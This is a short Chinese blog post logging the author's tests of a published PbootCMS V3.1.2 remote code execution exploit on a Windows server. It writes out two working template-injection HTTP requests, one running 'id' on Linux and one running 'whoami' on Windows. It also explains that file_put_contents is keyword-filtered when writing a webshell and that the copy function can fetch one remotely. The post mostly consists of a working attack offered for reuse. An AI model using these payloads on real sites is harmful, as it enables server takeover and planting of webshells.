服务器是 Windows
环境,测试苏安大佬的 exp
有问题,踩坑记录
苏安大佬的文章:pboot cms V3.1.2 “虚假的无文件落地RCE” - Suanve - Blog (susec.me)
使用苏安大佬 exp
测试 Linux
没问题
1 | GET /index.php/keyword?keyword=}{pboot:if((get_lg/*suanve-*/())/**/(get_backurl/*suanve-*/()))}123321suanve{/pboot:if}&backurl=;id HTTP/1.1 |
但是在 Windows
下不成功,测试使用如下 exp
可执行命令
1 | GET /?member/login/?a=}{pboot:if((get_lg/*aaa-*/())/**/("whoami"))}{/pboot:if} HTTP/1.1 |
写 webshell
时用 file_put_contents
写入时有关键字限制,存在以下关键字写不进去
可使用 copy
函数远程落地
end! 苏安大佬nb